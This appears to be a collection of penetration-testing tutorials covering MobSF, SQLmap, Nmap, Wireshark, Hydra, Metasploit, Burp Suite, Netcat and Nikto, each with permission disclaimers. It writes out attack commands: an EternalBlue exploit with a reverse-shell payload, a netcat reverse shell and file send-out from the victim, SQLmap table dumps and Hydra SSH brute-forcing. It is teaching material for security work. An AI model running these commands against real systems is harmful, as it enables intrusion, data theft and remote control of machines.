🦑 Mobile Security Framework (MobSF) Hacking Tutorial

MobSF (Mobile Security Framework) is an open-source automated pen-testing framework used for analyzing Android, iOS, and Windows apps. It supports both static and dynamic analysis, making it an essential tool for app security assessments.

---

## Prerequisites
1. Install MobSF:
- Clone the MobSF repository:

     git clone https://github.com/MobSF/Mobile-Security-Framework-MobSF.git
     cd Mobile-Security-Framework-MobSF
     

- Install dependencies and start the server:

     ./setup.sh  # For Linux/Mac
     python3 -m pip install -r requirements.txt
     python3 manage.py runserver
     

Access MobSF via http://127.0.0.1:8000.

2. Java Environment:
Ensure Java is installed for decompiling Android APKs:

   sudo apt install openjdk-11-jdk
   

3. Dynamic Analysis (Optional):
For dynamic analysis, you'll need:
- A VirtualBox VM or a rooted Android device.
- Genymotion (Android emulator).

---

## Step 1: Static Analysis
Static analysis examines the app's source code for vulnerabilities.

### Analyze an APK
1. Upload the APK file:
Drag and drop the APK onto the MobSF web interface.

2. Wait for processing:
MobSF will decompile the APK and display a detailed report.

### Review the Report
The report is divided into sections:
1. App Information:
Includes package name, version, permissions, and components.

2. Permissions Analysis:
Flags excessive or dangerous permissions like READ_SMS, WRITE_EXTERNAL_STORAGE, etc.

3. Manifest Analysis:
Examines the AndroidManifest.xml file for:
- Exported activities, services, and receivers.
- Insecure configurations.

4. Code Analysis:
Identifies potential vulnerabilities in the app's source code:
- Hardcoded API keys
- Weak encryption
- Unprotected credentials

5. Cryptographic Analysis:
Highlights insecure cryptographic practices, e.g., MD5 or hardcoded keys.

---

## Step 2: Dynamic Analysis
Dynamic analysis evaluates the app's behavior during runtime.

### Set Up Dynamic Analysis
1. Configure Emulator/Device:
- Install the MobSF dynamic analysis APK on the device.
- Set up ADB forwarding:

     adb forward tcp:5000 tcp:5000
     

2. Launch Dynamic Analysis:
Start the dynamic analysis module in MobSF and connect your device.

3. Monitor Runtime Behavior:
- Inspect API calls, file system access, and network traffic.
- Use MobSF's built-in proxy for traffic analysis.

---

## Step 3: Advanced Features
1. Binary Analysis:
MobSF can analyze binaries (.so files) for vulnerabilities.

2. Memory Dump Analysis:
Inspect memory dumps for sensitive information like passwords or keys.

3. Malware Analysis:
Identify malicious patterns in APKs:
- Suspicious API usage
- Embedded malware signatures

---

## Step 4: Automation with REST API
MobSF provides an API for automation. Here's how to analyze an APK using the API:

1. Start MobSF API Server:
Enable the API server in settings.py.

2. Submit an APK:

   curl -F "file=@app.apk" http://127.0.0.1:8000/api/v1/upload -H "Authorization: <your_api_key>"
   

3. Retrieve Results:

   curl http://127.0.0.1:8000/api/v1/report_json -H "Authorization: <your_api_key>"
   

---

## Step 5: Report Findings
Export the analysis report in various formats (PDF, HTML, JSON) for documentation.

---

### Common Use Cases
1. Testing Exported Components:
- Identify insecure exported activities, services, or receivers.

2. Analyzing Network Security:
- Check for plaintext HTTP traffic.
- Identify hardcoded server IPs or API keys.

3. Hardcoded Credentials:
- MobSF flags sensitive information like passwords embedded in the code.

---

### Important Notes
1. This tutorial is for ethical purposes. Ensure you have permission to test the app.
2. Use MobSF as part of a comprehensive app security assessment strategy.

---

Let me know if you'd like to explore specific features of MobSF!

🦑 Tool: SQLmap

SQLmap is an automated penetration testing tool for detecting and exploiting SQL injection vulnerabilities in databases.

---

### Basic Usage Command:

sqlmap -u "http://example.com/index.php?id=1"

### Explanation:
- sqlmap: Invokes the SQLmap tool.
- -u: Specifies the target URL.
- "http://example.com/index.php?id=1": Target URL with a parameter (id=1) to test for SQL injection.

---

### Advanced Example: Dumping a Database

sqlmap -u "http://example.com/index.php?id=1" --dbs

Explanation:
- --dbs: Enumerates all databases on the vulnerable server.

---

### Example: Dump Tables from a Specific Database

sqlmap -u "http://example.com/index.php?id=1" -D mydatabase --tables

Explanation:
- -D mydatabase: Specifies the database (mydatabase).
- --tables: Lists all tables in the specified database.

---

### Use Case: Extracting Data from a Table

sqlmap -u "http://example.com/index.php?id=1" -D mydatabase -T users --dump

Explanation:
- -T users: Specifies the table (users).
- --dump: Dumps all data from the specified table.

---

### Important Notes:
1. Always obtain proper authorization before testing a website or application.
2. Misuse of SQLmap for unauthorized activities is illegal and unethical. Use it responsibly for educational or security testing purposes only.

🦑 Tool: Nmap (Network Mapper)

Nmap is a powerful tool for network discovery and security auditing.

---

### Basic Usage Command:

nmap 192.168.1.1

Explanation:
- nmap: Invokes the Nmap tool.
- 192.168.1.1: Target IP address for scanning.

---

### Advanced Example: Scanning All Open Ports

nmap -p- 192.168.1.1

Explanation:
- -p-: Scans all 65,535 TCP ports instead of the default 1,000.

---

### Example: Service and Version Detection

nmap -sV 192.168.1.1

Explanation:
- -sV: Enables service version detection to identify software running on open ports.

---

### Example: OS Detection

nmap -O 192.168.1.1

Explanation:
- -O: Attempts to determine the operating system of the target.

---

### Use Case: Full Network Scan

nmap -A 192.168.1.0/24

Explanation:
- -A: Enables OS detection, version detection, script scanning, and traceroute.
- 192.168.1.0/24: Scans all devices in the subnet.

---

### Important Notes:
1. Use Nmap only on networks or systems where you have explicit permission to scan.
2. Unauthorized scanning can be illegal. Always ensure compliance with ethical guidelines.

🦑 Network Analyser Tool: Wireshark

Wireshark is a powerful network protocol analyzer used for capturing and examining network traffic in real time.

---

### Basic Usage Command:

wireshark

Explanation:
- Launches the Wireshark GUI for network packet analysis.

---

### Example: Capturing Traffic on a Specific Interface

tshark -i eth0

Explanation:
- tshark: Command-line version of Wireshark.
- -i eth0: Specifies the network interface (eth0) to capture traffic.

---

### Example: Save Captured Traffic to a File

tshark -i eth0 -w capture.pcap

Explanation:
- -w capture.pcap: Saves the captured packets to a file named capture.pcap for later analysis in Wireshark.

---

### Example: Filter for HTTP Traffic

tshark -i eth0 -f "tcp port 80"

Explanation:
- -f "tcp port 80": Filters the capture to only include HTTP traffic.

---

### Example: Analyze a Saved Packet Capture

wireshark capture.pcap

Explanation:
- Opens the file capture.pcap in Wireshark for in-depth analysis.

---

### Important Notes:
1. Always get permission before capturing network traffic.
2. Use Wireshark responsibly and ensure ethical usage for troubleshooting or learning purposes only.

🦑 Tool: Hydra

Hydra is a fast and flexible login brute-forcing tool that supports numerous protocols.

---

### Basic Usage Command:

hydra -l admin -p password123 192.168.1.1 ssh

Explanation:
- hydra: Runs the Hydra tool.
- -l admin: Specifies the username (admin).
- -p password123: Specifies the password (password123).
- 192.168.1.1: Target IP address.
- ssh: Protocol to brute-force (in this case, SSH).

---

### Example: Using a Password List

hydra -l admin -P /path/to/passwords.txt 192.168.1.1 ssh

Explanation:
- -P /path/to/passwords.txt: Points to a file containing a list of potential passwords.

---

### Example: Brute-Forcing with Multiple Usernames

hydra -L /path/to/usernames.txt -P /path/to/passwords.txt 192.168.1.1 ssh

Explanation:
- -L /path/to/usernames.txt: Specifies a file with multiple usernames.
- -P /path/to/passwords.txt: Specifies a file with potential passwords.

---

### Example: Verbose Output

hydra -V -l admin -p password123 192.168.1.1 ssh

Explanation:
- -V: Displays each login attempt in real-time.

---

### Important Notes:
1. Only use Hydra on systems you are authorized to test.
2. Unauthorized brute-forcing is illegal and unethical. Always ensure compliance with laws and ethical guidelines.

🦑 Tool: Metasploit Framework

Metasploit is a powerful penetration testing framework that helps exploit vulnerabilities in systems.

---

### Basic Usage Command:

msfconsole

Explanation:
- Launches the Metasploit Framework console.

---

### Example: Scanning for Vulnerabilities

use auxiliary/scanner/http/http_version
set RHOSTS 192.168.1.1
run

Explanation:
1. use auxiliary/scanner/http/http_version: Loads an auxiliary module to check the HTTP server version.
2. set RHOSTS 192.168.1.1: Sets the target host.
3. run: Executes the module.

---

### Example: Exploiting a Vulnerability

use exploit/windows/smb/ms17_010_eternalblue
set RHOST 192.168.1.1
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.100
run

Explanation:
1. use exploit/windows/smb/ms17_010_eternalblue: Loads the EternalBlue exploit module.
2. set RHOST 192.168.1.1: Sets the target's IP address.
3. set PAYLOAD windows/x64/meterpreter/reverse_tcp: Specifies the payload for remote shell access.
4. set LHOST 192.168.1.100: Sets the attacker's IP for the reverse connection.
5. run: Executes the exploit.

---

### Example: Checking Exploit Options

show options

Explanation:
- Lists all configurable options for the currently loaded module.

---

### Important Notes:
1. Always obtain explicit authorization before testing or exploiting a system.
2. Misuse of Metasploit for unauthorized purposes is illegal. Follow ethical and legal guidelines strictly.

🦑 Tool: Burp Suite - Web Application Exploiting

Burp Suite is a comprehensive tool used for web vulnerability scanning and exploitation in web applications.

---

### Basic Usage Command:

burpsuite

Explanation:
- Launches the Burp Suite graphical interface for interaction.

---

### Example: Setting Proxy to Intercept Traffic
1. Open Burp Suite and go to the Proxy tab.
2. Set your browser’s proxy to 127.0.0.1:8080.
3. Enable Intercept to capture HTTP/S requests from the browser.

---

### Example: Scanning a Web Application for Vulnerabilities
1. Go to the Target tab in Burp Suite.
2. Add the URL of the target web application.
3. Right-click on the target URL and select "Scan" to detect common vulnerabilities such as SQL injection, XSS, etc.

---

### Example: Brute Force Attack with Intruder
1. Capture a login request using Proxy.
2. Switch to the Intruder tab and load the captured request.
3. Define the positions for the username and password fields.
4. Set the payloads to attempt different username and password combinations.
5. Click Start Attack to perform the brute-force attack.

---

### Example: Spidering a Website

burpsuite -spider https://example.com

Explanation:
- -spider https://example.com: Automatically crawls and maps the website to identify all accessible URLs.

---

### Important Notes:
1. Burp Suite is intended for ethical hacking, penetration testing, and vulnerability assessments.
2. Always obtain explicit permission before testing or exploiting web applications.
3. Unauthorized exploitation is illegal and against ethical guidelines.

🦑 Tool: Netcat - Network Hacking and Administration

Netcat is a versatile networking tool used for reading from and writing to network connections using TCP or UDP, often referred to as the "Swiss Army knife" of networking.

---

### Basic Usage Command:

nc -lvp 4444

Explanation:
- nc: Invokes Netcat.
- -l: Tells Netcat to listen for incoming connections.
- -v: Enables verbose mode for more detailed output.
- -p 4444: Specifies the port (4444) to listen on.

---

### Example: Creating a Reverse Shell (Attacker's Side)

nc -lvp 4444

- Listens on port 4444 for incoming connections from the target machine.

### Example: Reverse Shell (Victim's Side)

nc -e /bin/bash 192.168.1.1 4444

Explanation:
- -e /bin/bash: Executes the Bash shell upon connection.
- 192.168.1.1: Attacker's IP address.
- 4444: Port to connect to on the attacker's machine.

---

### Example: Banner Grabbing

nc -v 192.168.1.1 80

Explanation:
- -v: Enables verbose mode.
- 192.168.1.1: Target IP.
- 80: Common HTTP port. Netcat can be used to grab the banner or response from web servers.

---

### Example: File Transfer
Send a File (Attacker's Side):

nc -lvp 4444 > received_file.txt

Receive a File (Victim's Side):

nc 192.168.1.1 4444 < file_to_send.txt

---

### Important Notes:
1. Netcat can be a powerful tool for legitimate network testing and troubleshooting.
2. Unauthorized use, such as exploiting vulnerabilities or creating backdoors, is illegal. Always ensure you have permission before using Netcat for penetration testing.

🦑 Tool: Nikto - Web Server Scanning

Nikto is a web server scanner that detects security vulnerabilities in web servers, including outdated software, security misconfigurations, and other potential threats.

---

### Basic Usage Command:

nikto -h http://example.com

Explanation:
- nikto: Runs the Nikto tool.
- -h http://example.com: Specifies the target host to scan (http://example.com in this case).

---

### Example: Scanning for Specific Vulnerabilities

nikto -h http://example.com -Tuning 3

Explanation:
- -Tuning 3: Scans for known vulnerabilities (such as file permissions, potential information leaks, etc.).

---

### Example: Output Results to a File

nikto -h http://example.com -o scan_results.txt

Explanation:
- -o scan_results.txt: Saves the scan results to a text file named scan_results.txt.

---

### Example: Scan with Authentication

nikto -h http://example.com -auth "admin:password123"

Explanation:
- -auth "admin:password123": Uses basic HTTP authentication with the provided username and password.

---

### Example: Scan a Specific Port

nikto -h http://example.com -p 8080

Explanation:
- -p 8080: Specifies a custom port (8080) to scan for vulnerabilities.

---

### Important Notes:
1. Nikto is a powerful tool for security researchers and penetration testers.
2. Unauthorized scanning and exploitation of web servers is illegal. Always obtain proper authorization before using Nikto for vulnerability assessments.

14 Hours Bug Bounty Course 2024 Updated

https://youtu.be/TTw-EY7F1rM